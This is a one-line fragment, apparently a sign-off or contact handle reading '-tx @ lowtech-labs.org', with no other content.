
-tx @ lowtech-labs.org
